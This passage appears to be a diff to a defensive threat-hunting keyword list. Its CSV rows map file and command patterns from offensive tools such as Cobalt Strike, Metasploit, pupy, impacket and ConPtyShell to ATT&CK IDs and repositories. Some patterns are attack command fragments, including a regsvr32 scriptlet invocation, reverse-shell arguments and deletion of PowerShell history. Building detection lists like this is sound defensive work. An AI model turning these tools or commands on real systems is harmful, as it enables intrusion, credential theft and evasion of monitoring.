+"*reGeorgSocksProxy.py*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z"
+"*register-python-argcomplete --no-defaults exegol*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*registry_hijacking_eventvwr*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX.
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*registry_hijacking_fodhelper*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*RegistryImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript).
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*registry-read.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*RegistryTinker.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z"
+"*RegReeper.7z*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter.
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*RegReeper.cpp*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*RegReeper.exe*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*RegReeper.sln*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter.
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*RegReeper.vcxproj*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*Reg-Restore-Persistence-Mole-main*","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter.
RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","47","15","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z"
+"*regsvr32.exe /s /n /u /i: * scrobj.dll*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z"
+"*regsvr32_command_delivery_server*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit.
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*reinstall_original_pw.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z"
+"*rekallreader.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z"
+"*relay*/utils/enum.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*RelayPackets.py*","offensive_tool_keyword","responder","LLMNR.
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*Release of BloodHound*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*REM Title: Harvester_OF_SORROW*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*RemAdm*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword for remote administration tools ","T1021 - T1027 - T1046 - T1057 - T1068 - T1072 - T1078 - T1135 - T1485 - T1489 - T1497 - T1547","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*remiflavien1/nse-install*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
+"*remiflavien1/recon-archy*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company
hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","13","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z"
+"*-remote -destPipe * -pipeHost * -destHost *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z"
+"*Remote/lastpass/lastpass.x86.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*Remote/setuserpass/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 
- T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*Remote/shspawnas*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*Remote/suspendresume/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z"
+"*remote_exploit.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*remote_exploit_cmd_stager.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*remote_exploit_demo_template.erb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*remote_shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*-remote=127.0.0.1:3000*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*remote-exec *jump *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*RemoteHashRetrieval.ps1*","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","356","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z"
+"*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z"
+"*remote-method-guesser/rmg*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*remote-method-guesser-master*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java 
RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*RemoteNTDLL.cpp*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z"
+"*RemoteNTDLL.exe*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z"
+"*remotereg.cna*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z"
+"*RemoteScanner.exe*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A",,"N/A",,,
+"*remotewinenum.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Remove_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*removeexe-persistence*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*Remove-Item (Get-PSreadlineOption).HistorySavePath*","offensive_tool_keyword","powershell","Delete powershell history","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*Remove-Item *C:\Program 
